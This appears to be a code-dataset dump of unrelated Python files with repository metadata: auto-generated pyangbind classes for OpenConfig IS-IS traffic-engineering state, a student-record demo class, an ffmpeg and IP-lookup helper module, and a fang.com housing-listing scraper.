raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'levels', 'level', 'traffic-engineering', 'state']
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: When set to true, the functionality within which this leaf is
defined is enabled, when set to false it is explicitly disabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enabled must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)""",
})
self.__enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
def _get_ipv4_router_id(self):
"""
Getter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv4_router_id
def _set_ipv4_router_id(self, v, load=False):
"""
Setter method for ipv4_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv4_router_id (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv4_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv4_router_id() directly.
YANG Description: IPv4 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv4_router_id must be of a type compatible with inet:ipv4-address-no-zone""",
'defined-type': "inet:ipv4-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
})
self.__ipv4_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv4_router_id(self):
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
def _get_ipv6_router_id(self):
"""
Getter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
return self.__ipv6_router_id
def _set_ipv6_router_id(self, v, load=False):
"""
Setter method for ipv6_router_id, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/ipv6_router_id (inet:ipv6-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ipv6_router_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ipv6_router_id() directly.
YANG Description: IPv6 MPLS Traffic Engineering Router-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ipv6_router_id must be of a type compatible with inet:ipv6-address-no-zone""",
'defined-type': "inet:ipv6-address-no-zone",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)""",
})
self.__ipv6_router_id = t
if hasattr(self, '_set'):
self._set()
def _unset_ipv6_router_id(self):
self.__ipv6_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}), is_leaf=True, yang_name="ipv6-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv6-address-no-zone', is_config=False)
enabled = __builtin__.property(_get_enabled)
ipv4_router_id = __builtin__.property(_get_ipv4_router_id)
ipv6_router_id = __builtin__.property(_get_ipv6_router_id)
_pyangbind_elements = OrderedDict([('enabled', enabled), ('ipv4_router_id', ipv4_router_id), ('ipv6_router_id', ipv6_router_id), ])
| [
"zblevins@netflix.com"
] | zblevins@netflix.com |
95ec8fd7a6bd143e8448f66896fba383bddf5373 | e7d5db388df22905d3a00eaf970acbcf1c839bab | /python/.old3/student.py | 8e4f20257fe54f0a6719c69fc0c6d7f0ee7fff92 | [] | no_license | seanho00/twu | 0c47afe4bfb47bb86c81f4871a8e5973dbc843a2 | 5e97bd08c8a281f77c16a1ae890d234972a4622e | refs/heads/master | 2020-12-25T15:08:09.413702 | 2016-08-30T04:52:55 | 2016-08-30T04:52:55 | 66,873,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | """Definitions for a student info record.
Sean Ho for CMPT140 demo.
"""
class Date:
    """A simple calendar date holding day, month and year as plain ints."""

    def __init__(self, y=2000, m=1, d=1):
        """Create a date, defaulting to 1 January 2000.

        pre: y/m/d must be integers in the appropriate range.
        See also: datetime.date:
        http://docs.python.org/library/datetime.html
        """
        self.year, self.month, self.day = y, m, d

    def __str__(self):
        """Render as zero-padded dd/mm/yyyy."""
        return f"{self.day:02d}/{self.month:02d}/{self.year:04d}"
class Student:
    """A student record: name, ID number, birthdate and GPA."""

    def __init__(self, f='', l='', i=0, bd=None, g=4.0):
        """Create a student; the birthdate defaults to a fresh Date()."""
        self.first = f
        self.last = l
        self.ID = i
        self.GPA = g
        # Fall back to the Date default (1 Jan 2000) when none is given.
        self.birthdate = bd if bd is not None else Date()

    def __str__(self):
        """One-line human-readable summary of the record."""
        return (f"ID# {self.ID:06d}: {self.first} {self.last} "
                f"({self.birthdate}) GPA={self.GPA:4.2f}")
| [
"github@seanho.com"
] | github@seanho.com |
4d42a0286cd3434b0e825806b741203dfc7d2dc3 | a5fcfbef729c372d3a5396619c8ab03085d9fdb1 | /pylib/cmdutils.py | ce1c70348424691f2a26817d0b7c833ec48d70c9 | [] | no_license | decli/winterpy | 88bb127729937885d7ae021e2b6439d8dd8bdc00 | 082cf9f30c66a33291b4a7737f91e90990c59d92 | refs/heads/master | 2021-01-18T08:43:06.804938 | 2014-06-01T10:41:15 | 2014-06-01T10:58:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # vim:fileencoding=utf-8
'''
call external tools to do things.
'''
import subprocess
from functools import lru_cache
@lru_cache(maxsize=20)
def lookupip(ip, cmd='cip'):
    """Look up *ip* via the external *cmd* tool and return the cleaned output.

    The 'CZ88.NET' watermark is stripped from the tool's output
    (presumably a qqwry-style IP-location lookup — confirm against the
    installed ``cip`` command).  Returns '-' when the output is empty.
    Results are memoized for the last 20 distinct calls.
    """
    cmdline = subprocess.list2cmdline([cmd, ip])
    location = subprocess.getoutput(cmdline).replace('CZ88.NET', '').strip()
    return location or '-'
def check_mediafile(file):
    '''intergrity check with ffmpeg

    Decode the whole file with ffmpeg at error log level and report
    success when ffmpeg prints nothing on stderr.

    also return ``False`` when reading the file fails
    From http://superuser.com/a/100290/40869
    '''
    # subprocess.run handles the wait/communicate dance of the old
    # Popen-based version and cannot leak the child process.
    proc = subprocess.run(
        ['ffmpeg', '-v', 'error', '-i', file, '-f', 'null', '-'],
        stderr=subprocess.PIPE)
    # Empty stderr (after stripping whitespace) means no decode errors.
    return not proc.stderr.strip()
| [
"lilydjwg@gmail.com"
] | lilydjwg@gmail.com |
f4b639cb8c07e02fec8aa6043412392fe54c6158 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/www.fang.com/get_hourse.py | 2f84d0325f7b83294a58f290281d20927869f256 | [] | no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 5,243 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import xlwt3
import threading
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.5",
"Connection": "keep-alive",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"}
class Get_infor(threading.Thread):
    """Scrape one house's detail page ("xiangqing") from fang.com.

    Despite subclassing Thread, callers in this file invoke run()
    directly, so the scrape executes synchronously.  Results are left
    on instance attributes; self.statue is 1 on success, 0 on any
    failure (the whole parse is wrapped in a bare except).
    """
    def __init__(self,url):
        super(Get_infor,self).__init__()
        # Rewrite the listing URL into the detail-page URL.
        self.url=url.replace('esf/','')+'xiangqing/'
        self.headers = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.5",
            "Connection": "keep-alive",
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"}
    def run(self):
        # Optimistically mark success; reset to 0 on any exception below.
        self.statue=1
        try:
            try:
                print(self.url)
                # The site serves GBK; re-decode the mis-labelled response.
                html=requests.get(self.url,headers=self.headers,timeout=30).text.encode('ISO-8859-1').decode('gbk','ignore')
            except:
                # Fall back to requests' own decoding if the re-encode fails.
                html=requests.get(self.url,headers=self.headers,timeout=30).text
            soup=BeautifulSoup(html,'lxml').find('div',attrs={'class':'leftinfo'})
            self.title=soup.find('span',attrs={'class':'floatl'}).get_text()
            # Headline figures: three <span>s under the first picture block.
            pri_table=soup.find('dl',attrs={'class':'firstpic'}).find('dd',style='margin-top:10px;').find_all('span')
            self.price=pri_table[0].get_text()
            # NOTE(review): "lilv" (利率) suggests these two are rate figures
            # (monthly / overall) -- confirm against the live page layout.
            self.month_lilv=pri_table[1].get_text()
            self.lilv=pri_table[2].get_text()
            tables=soup.find('dl',attrs={'class':'lbox'}).find_all('dd')
            # Default every field to a single space so the pipe-joined output
            # line in Main.run() always has the same number of columns.
            self.ground=' '
            self.address=' '
            self.area=' '
            self.cell=' '
            self.wuye=' '
            self.date=' '
            self.jiegou=' '
            self.type=' '
            self.mianji=' '
            # NOTE(review): self.ground is initialized twice (also above).
            self.ground=' '
            self.hushu=' '
            self.green=' '
            self.rongji=' '
            self.wuye_price=' '
            # Match each <dd> by its bold label text and strip the label off
            # the value.  Labels must match byte-for-byte (fullwidth colons).
            for item in tables:
                if item.find('strong').get_text()=='小区地址:':
                    self.address=item.get('title')
                if item.find('strong').get_text()=='所属区域:':
                    self.area=item.get_text().replace('所属区域:','')
                # NOTE(review): this label is matched WITHOUT the trailing
                # colon but stripped WITH it -- presumably mirrors the page
                # markup; confirm before "fixing".
                if item.find('strong').get_text()=='环线位置':
                    self.cell=item.get_text().replace('环线位置:','')
                if item.find('strong').get_text()=='物业类别:':
                    self.wuye=item.get_text().replace('物业类别:','')
                if item.find('strong').get_text()=='竣工时间:':
                    self.date=item.get_text().replace('竣工时间:','')
                if item.find('strong').get_text()=='建筑结构:':
                    self.jiegou=item.get_text().replace('建筑结构:','')
                if item.find('strong').get_text()=='建筑类别:':
                    self.type=item.get_text().replace('建筑类别:','')
                if item.find('strong').get_text()=='建筑面积:':
                    self.mianji=item.get_text().replace('建筑面积:','')
                if item.find('strong').get_text()=='占地面积:':
                    self.ground=item.get_text().replace('占地面积:','')
                if item.find('strong').get_text()=='当期户数:':
                    self.hushu=item.get_text().replace('当期户数:','')
                if item.find('strong').get_text()=='绿 化 率:':
                    self.green=item.get_text().replace('绿 化 率:','')
                if item.find('strong').get_text()=='容 积 率:':
                    self.rongji=item.get_text().replace('容 积 率:','')
                if item.find('strong').get_text()=='物 业 费:':
                    self.wuye_price=item.get_text().replace('物 业 费:','')
        except:
            # Any network/parse failure marks the record as unusable.
            self.statue=0
def get_urls(url):
    """Return the house detail-page links found on one listing page."""
    html = requests.get(url, headers=headers).text
    listing = BeautifulSoup(html, 'lxml').find('div', attrs={'class': 'houseList'})
    entries = listing.find_all('div', id='Div1')
    return [entry.find('div', attrs={'class': 'img rel floatl'}).find('a').get('href')
            for entry in entries]
class Main():
    """Driver: walk 80 listing pages and append one pipe-separated line
    per successfully scraped house to data.txt."""
    def __init__(self):
        # Output file stays open for the lifetime of the run; lines are
        # written incrementally so a crash keeps earlier results.
        self.f=open('data.txt','w')
        self.count=0
    def run(self):
        # Pages 1..80 of the fang.com Shanghai second-hand listing
        # (area code 18 in the URL path).
        for page in range(80):
            urls=get_urls('http://esf.sh.fang.com/housing/18__0_0_0_0_%s_0_0/'%(str(page+1)))
            for url in urls:
                # NOTE(review): Get_infor is a Thread subclass but run()
                # is called directly, so scraping is sequential.
                work=Get_infor(url)
                work.run()
                # statue == 0 means the scrape/parse failed; skip the record.
                if work.statue==0:
                    continue
                infor=work.title+'|'+work.address+'|'+work.price+'|'+work.month_lilv+'|'+work.lilv+"|"+work.area+'|'+work.cell+'|'+work.wuye+'|'+work.date+'|'+work.jiegou+'|'+work.type+'|'+work.mianji+'|'+work.ground+'|'+work.hushu+'|'+work.green+"|"+work.rongji+'|'+work.wuye_price+'|'+work.url+'\n'
                self.f.write(infor)
                # Progress indicator: running total of saved records.
                self.count+=1
                print(self.count)
# Script entry point: scrape all listing pages and write data.txt.
if __name__=='__main__':
    work=Main()
    work.run()
| [
